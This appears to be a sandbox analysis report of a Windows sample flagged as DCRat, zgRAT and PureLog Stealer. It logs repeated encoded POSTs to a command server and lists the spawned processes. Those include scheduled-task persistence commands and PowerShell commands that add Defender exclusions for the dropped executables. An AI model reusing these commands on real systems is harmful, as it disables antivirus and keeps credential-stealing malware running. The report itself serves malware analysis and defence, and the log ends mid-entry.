                                                  Aug 1, 2024 07:39:10.130913973 CEST1012OUTData Raw: 51 53 58 50 5a 58 58 57 5c 5e 5a 51 54 5f 57 5a 57 53 5e 5b 56 5f 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSXPZXXW\^ZQT_WZWS^[V_QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"329]58$/?8.T?&:&(2_&3 ,>]!87]&%&G#.X!
                                                  Aug 1, 2024 07:39:10.256299019 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:10.413655996 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilr2mBsXPcKJgAomkey1ZdbKvzxm3mNVXVjqBzzV3aZO2J9DsCno1NA%2Bu5zfe496TZE%2FuIzmJhWvvnxL7rZ0%2Fgr8sVjgKLjzCAKPE2zRf6vaecq3BJMsd0wrBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c74cec642e7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  146192.168.2.449883172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:10.636734962 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:10.990411043 CEST1012OUTData Raw: 54 51 5d 51 5a 5e 58 53 5c 5e 5a 51 54 57 57 51 57 50 5e 5b 56 5d 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQ]QZ^XS\^ZQTWWQWP^[V]Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'""5[$]$$?)%&8',2X%3<W/'X#(/2&G#.X!
                                                  Aug 1, 2024 07:39:11.149471045 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:11.404432058 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SAci49NKXxwkrB%2BT5CVX0yEOx5AD0zTGgH9jD2KKgMeVVVFa3VACBKrCg%2BWETye55vEqLQBb5d1mTDT%2BJdm475G5HsYzxkud0p%2FiPpguq4O3XgXu21yXSCHVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c7a6ffc43a0-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  147192.168.2.449884172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:11.526123047 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:11.881086111 CEST1012OUTData Raw: 51 55 58 54 5a 58 58 55 5c 5e 5a 51 54 5e 57 52 57 5f 5e 56 56 55 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUXTZXXU\^ZQT^WRW_^VVUQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$%"-Z05+)&&$&/6Z$3 R/.8#882&G#.X!
                                                  Aug 1, 2024 07:39:11.984519958 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:12.224046946 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60puzvnxsPTL3M6yboH%2F9GMD6AroNBflj0CSRPLLaPZA07ygiLYbUupyP8dcFDuTqg438VzPp%2BQZX7REqfBOmyz7HghUHqeIjHtvzSg74x0DP7oj3ZvpOBBU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c7f9c758ce0-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  148192.168.2.449885172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:12.465130091 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:12.825376034 CEST1012OUTData Raw: 54 51 58 55 5f 59 5d 57 5c 5e 5a 51 54 51 57 55 57 50 5e 56 56 54 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXU_Y]W\^ZQTQWUWP^VVTQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z$)Z5[$&&3+5*6%28/S%,.Y&U(//";''%&G#.X!
                                                  Aug 1, 2024 07:39:12.919717073 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:13.161012888 CEST594INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GrbWRsS%2FhF4f9MqZA%2FUp3h1pdw%2F0OXffOT2g1H%2Bh0XGQTCZQ%2BlmFfgAvbcehiYoObroQ05rs60qpD%2BB66wds6PzFgEs65eKgSHIh7rJ6IU%2B%2FXxoXrk1wN2TRKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c857f2f8cb3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  149192.168.2.449886172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:13.291446924 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:01:37:08
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\UuIspZT5b6.exe"
                                                  Imagebase:0xca0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:01:37:12
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"
                                                  Imagebase:0x7ff652580000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:01:37:12
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:01:37:12
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP"
                                                  Imagebase:0x7ff6b3dc0000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Recovery\dllhost.exe
                                                  Imagebase:0xed0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 55%, Virustotal, Browse
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Recovery\dllhost.exe
                                                  Imagebase:0xa20000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "UuIspZT5b6U" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\UuIspZT5b6.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:27
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:29
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:30
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:31
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:32
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:33
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:34
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:35
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:36
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat"
                                                  Imagebase:0x7ff664eb0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:37
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                                                  Imagebase:0x410000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 55%, Virustotal, Browse
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff7e82c0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:40
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                                                  Imagebase:0x50000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:41
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Imagebase:0x170000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 55%, Virustotal, Browse
                                                  Has exited:true

                                                  General

                                                  Target ID:42
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Imagebase:0x550000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:43
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Imagebase:0x10000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Imagebase:0xef0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:45
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff7586d0000
                                                  File size:108'032 bytes
